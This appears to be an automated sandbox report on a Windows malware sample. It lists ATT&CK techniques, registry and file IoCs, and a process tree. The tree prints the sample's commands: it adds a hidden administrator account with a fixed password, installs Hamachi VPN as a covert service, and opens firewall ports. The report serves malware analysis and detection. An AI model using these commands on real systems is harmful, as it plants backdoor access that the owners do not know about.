b0764ed94622c8f98631c555e7e374e4cfeefec3475b99c4bde2f4b3036bbc6e

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/09/2024, 10:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe
Size

1.5MB
MD5

00d7f6a6adc412ea63bb97a17aa6a8e4
SHA1

6365cc10329384cf25e37c68ad416065ed14b053
SHA256

b0764ed94622c8f98631c555e7e374e4cfeefec3475b99c4bde2f4b3036bbc6e
SHA512

4eb3f1b7bf1f8a425982c90b1516c8f2a3633b4de0c87520ffe49258438d0a400c2544071ef1112dfd38237650d187cf994558cc61101e3233e08e8c2a973d8e
SSDEEP

24576:aXaRt7te5ARs1R5fjWoibbavSzNlLPM7GcX325UR6hvHrcDLT204H1SBJYI4:aX5AGL57qbWvW453DRiHgHT5e

Score

10^/10

discovery evasion persistence privilege_escalation upx

Malware Config

Signatures

Modifies firewall policy service 3 TTPs 26 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess\Parameters	FPEnabler.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DoNotAllowExceptions = "0"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\137:UDP = "137:UDP:*:enabled:@xpsp2res.dll,-22001"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\2790:TCP = "2790:TCP:*:enabled:IntelliAdmin_Lan"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\139:TCP = "139:TCP:*:enabled:@xpsp2res.dll,-22004"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\445:TCP = "445:TCP:*:enabled:@xpsp2res.dll,-22005"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\2790:TCP = "2790:TCP:*:enabled:IntelliAdmin_Lan"	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services\SharedAccess	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\445:TCP = "445:TCP:*:enabled:@xpsp2res.dll,-22005"	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\139:TCP = "139:TCP:*:enabled:@xpsp2res.dll,-22004"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\137:UDP = "137:UDP:*:enabled:@xpsp2res.dll,-22001"	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\138:UDP = "139:UDP:*:enabled:@xpsp2res.dll,-22002"	FPEnabler.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\System\CurrentControlSet\Services	FPEnabler.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\138:UDP = "139:UDP:*:enabled:@xpsp2res.dll,-22002"	FPEnabler.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\DRIVERS\hamachi.sys	nicmgr.exe
File opened for modification	C:\Windows\system32\DRIVERS\SETBB8F.tmp	nicmgr.exe
File created	C:\Windows\system32\DRIVERS\SETBB8F.tmp	nicmgr.exe

Executes dropped EXE 12 IoCs

pid	Process
3412	Hamachi.exe
2960	HamachiSetup.exe
3192	nicmgr.exe
940	nicmgr.exe
4132	nicmgr.exe
1360	nicmgr.exe
804	nicmgr.exe
4316	nicmgr.exe
4356	nicmgr.exe
1956	nicmgr.exe
4448	instsrv.exe
4008	FPEnabler.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/3412-53-0x0000000000400000-0x00000000004A2000-memory.dmp	autoit_exe
behavioral2/memory/3412-67-0x0000000000400000-0x00000000004A2000-memory.dmp	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\instsrv.exe	cmd.exe
File created	C:\Windows\SysWOW64\srvany.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\srvany.exe	cmd.exe
File created	C:\Windows\SysWOW64\instsrv.exe	cmd.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234d5-11.dat	upx
behavioral2/memory/3412-13-0x0000000000400000-0x00000000004A2000-memory.dmp	upx
behavioral2/files/0x00080000000234cb-16.dat	upx
behavioral2/memory/2960-17-0x0000000000400000-0x0000000000484000-memory.dmp	upx
behavioral2/memory/3412-53-0x0000000000400000-0x00000000004A2000-memory.dmp	upx
behavioral2/memory/2960-57-0x0000000000400000-0x0000000000484000-memory.dmp	upx
behavioral2/memory/2960-66-0x0000000000400000-0x0000000000484000-memory.dmp	upx
behavioral2/memory/3412-67-0x0000000000400000-0x00000000004A2000-memory.dmp	upx

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Hamachi\uninstall.exe	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\uninstall.lng	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\hamachi.ttf	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\nicmgr.exe	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\uninstall.dat	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\hamachi.exe	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\hamachi.key	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\license.txt	HamachiSetup.exe
File created	C:\Program Files (x86)\Hamachi\hamachi.lng	HamachiSetup.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	nicmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FPEnabler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HamachiSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hamachi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	instsrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Checks SCSI registry key(s) 3 TTPs 20 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters	nicmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	nicmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters	nicmgr.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/hamachi	HamachiSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.hamachi	HamachiSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi	HamachiSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\shell\open\command	HamachiSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\shell	HamachiSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\shell\open	HamachiSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\shell\open\command\ = "\"C:\\Program Files (x86)\\Hamachi\\hamachi.exe\" \"%L\""	HamachiSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\shell\open\command\Content Type = "application/hamachi"	HamachiSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/hamachi\Extension = ".hamachi"	HamachiSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.hamachi\ = "Hamachi"	HamachiSetup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hamachi\ = "Hamachi by LogMeIn, Inc."	HamachiSetup.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3276	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeLoadDriverPrivilege	3192	nicmgr.exe
Token: SeLoadDriverPrivilege	3192	nicmgr.exe
Token: SeLoadDriverPrivilege	3192	nicmgr.exe
Token: SeLoadDriverPrivilege	3192	nicmgr.exe
Token: SeLoadDriverPrivilege	1360	nicmgr.exe
Token: SeLoadDriverPrivilege	1360	nicmgr.exe
Token: SeLoadDriverPrivilege	804	nicmgr.exe
Token: SeLoadDriverPrivilege	804	nicmgr.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe
3412	Hamachi.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2960	HamachiSetup.exe
2960	HamachiSetup.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 3328	4532	00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe	83
PID 4532 wrote to memory of 3328	4532	00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe	83
PID 4532 wrote to memory of 3328	4532	00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe	83
PID 3328 wrote to memory of 3748	3328	cmd.exe	84
PID 3328 wrote to memory of 3748	3328	cmd.exe	84
PID 3328 wrote to memory of 3748	3328	cmd.exe	84
PID 3748 wrote to memory of 1184	3748	net.exe	85
PID 3748 wrote to memory of 1184	3748	net.exe	85
PID 3748 wrote to memory of 1184	3748	net.exe	85
PID 3328 wrote to memory of 2864	3328	cmd.exe	86
PID 3328 wrote to memory of 2864	3328	cmd.exe	86
PID 3328 wrote to memory of 2864	3328	cmd.exe	86
PID 2864 wrote to memory of 3144	2864	net.exe	87
PID 2864 wrote to memory of 3144	2864	net.exe	87
PID 2864 wrote to memory of 3144	2864	net.exe	87
PID 3328 wrote to memory of 3368	3328	cmd.exe	88
PID 3328 wrote to memory of 3368	3328	cmd.exe	88
PID 3328 wrote to memory of 3368	3328	cmd.exe	88
PID 3368 wrote to memory of 436	3368	net.exe	89
PID 3368 wrote to memory of 436	3368	net.exe	89
PID 3368 wrote to memory of 436	3368	net.exe	89
PID 3328 wrote to memory of 3412	3328	cmd.exe	90
PID 3328 wrote to memory of 3412	3328	cmd.exe	90
PID 3328 wrote to memory of 3412	3328	cmd.exe	90
PID 3412 wrote to memory of 2960	3412	Hamachi.exe	91
PID 3412 wrote to memory of 2960	3412	Hamachi.exe	91
PID 3412 wrote to memory of 2960	3412	Hamachi.exe	91
PID 2960 wrote to memory of 3192	2960	HamachiSetup.exe	95
PID 2960 wrote to memory of 3192	2960	HamachiSetup.exe	95
PID 2960 wrote to memory of 940	2960	HamachiSetup.exe	99
PID 2960 wrote to memory of 940	2960	HamachiSetup.exe	99
PID 2960 wrote to memory of 4132	2960	HamachiSetup.exe	101
PID 2960 wrote to memory of 4132	2960	HamachiSetup.exe	101
PID 2960 wrote to memory of 1360	2960	HamachiSetup.exe	102
PID 2960 wrote to memory of 1360	2960	HamachiSetup.exe	102
PID 2960 wrote to memory of 804	2960	HamachiSetup.exe	103
PID 2960 wrote to memory of 804	2960	HamachiSetup.exe	103
PID 2960 wrote to memory of 4316	2960	HamachiSetup.exe	104
PID 2960 wrote to memory of 4316	2960	HamachiSetup.exe	104
PID 2960 wrote to memory of 4356	2960	HamachiSetup.exe	107
PID 2960 wrote to memory of 4356	2960	HamachiSetup.exe	107
PID 2960 wrote to memory of 2208	2960	HamachiSetup.exe	109
PID 2960 wrote to memory of 2208	2960	HamachiSetup.exe	109
PID 2960 wrote to memory of 2208	2960	HamachiSetup.exe	109
PID 2960 wrote to memory of 4968	2960	HamachiSetup.exe	113
PID 2960 wrote to memory of 4968	2960	HamachiSetup.exe	113
PID 2960 wrote to memory of 4968	2960	HamachiSetup.exe	113
PID 2960 wrote to memory of 1956	2960	HamachiSetup.exe	115
PID 2960 wrote to memory of 1956	2960	HamachiSetup.exe	115
PID 3328 wrote to memory of 4448	3328	cmd.exe	116
PID 3328 wrote to memory of 4448	3328	cmd.exe	116
PID 3328 wrote to memory of 4448	3328	cmd.exe	116
PID 3328 wrote to memory of 3276	3328	cmd.exe	117
PID 3328 wrote to memory of 3276	3328	cmd.exe	117
PID 3328 wrote to memory of 3276	3328	cmd.exe	117
PID 3328 wrote to memory of 4964	3328	cmd.exe	118
PID 3328 wrote to memory of 4964	3328	cmd.exe	118
PID 3328 wrote to memory of 4964	3328	cmd.exe	118
PID 3328 wrote to memory of 4008	3328	cmd.exe	119
PID 3328 wrote to memory of 4008	3328	cmd.exe	119
PID 3328 wrote to memory of 4008	3328	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\bt73068.bat "C:\Users\Admin\AppData\Local\Temp\00d7f6a6adc412ea63bb97a17aa6a8e4_JaffaCakes118.exe"
  2⤵
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3328
- - C:\Windows\SysWOW64\net.exe
    C:\Windows\system32\net user Secure AM_Secure_04 /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Secure AM_Secure_04 /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:1184
- - C:\Windows\SysWOW64\net.exe
    C:\Windows\system32\net localgroup administrators /add Secure
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add Secure
      4⤵
      System Location Discovery: System Language Discovery
      PID:3144
- - C:\Windows\SysWOW64\net.exe
    C:\Windows\system32\net user "Secure" /EXPIRES:never
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user "Secure" /EXPIRES:never
      4⤵
      System Location Discovery: System Language Discovery
      PID:436
- - C:\Users\Admin\AppData\Local\Hamachi.exe
    C:\Users\Admin\AppData\Local\Hamachi.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Users\Admin\AppData\Local\HamachiSetup.exe
      HamachiSetup.exe
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2960
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot ra_inst C:\Users\Admin\AppData\Local\Temp\ha002001.tmp\hamachi.inf
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot unbind ms_pacer
        5⤵
        Executes dropped EXE
        
        PID:940
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot config 5.0.0.1
        5⤵
        Executes dropped EXE
        
        PID:4132
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot disable
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1360
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot enable
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:804
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot rename Hamachi
        5⤵
        Executes dropped EXE
        
        PID:4316
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot unbind ms_tcpip6
        5⤵
        Executes dropped EXE
        
        PID:4356
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface tcp set global autotuninglevel=disabled
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2208
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface tcp set global rss=disabled
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4968
    - - C:\Program Files (x86)\Hamachi\nicmgr.exe
        
        "C:\Program Files (x86)\Hamachi\nicmgr.exe" poneyhot set_lo
        5⤵
        Executes dropped EXE
        
        PID:1956
- - C:\Windows\SysWOW64\instsrv.exe
    C:\Windows\system32\instsrv.exe Secure C:\Windows\system32\srvany.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Secure\Parameters /v Application /t REG_SZ /d "C:\Program Files\Hamachi\hamachi.exe -srvany"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3276
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\REG copy ôHKCU\Software\Applied Networkingö ôHKEY_USERS\.DEFAULT\Software\Applied Networkingö /s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4964
- - C:\Users\Admin\AppData\Local\FPEnabler.exe
    C:\Users\Admin\AppData\Local\FPEnabler.exe -enable
    3⤵
    - Modifies firewall policy service
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4008

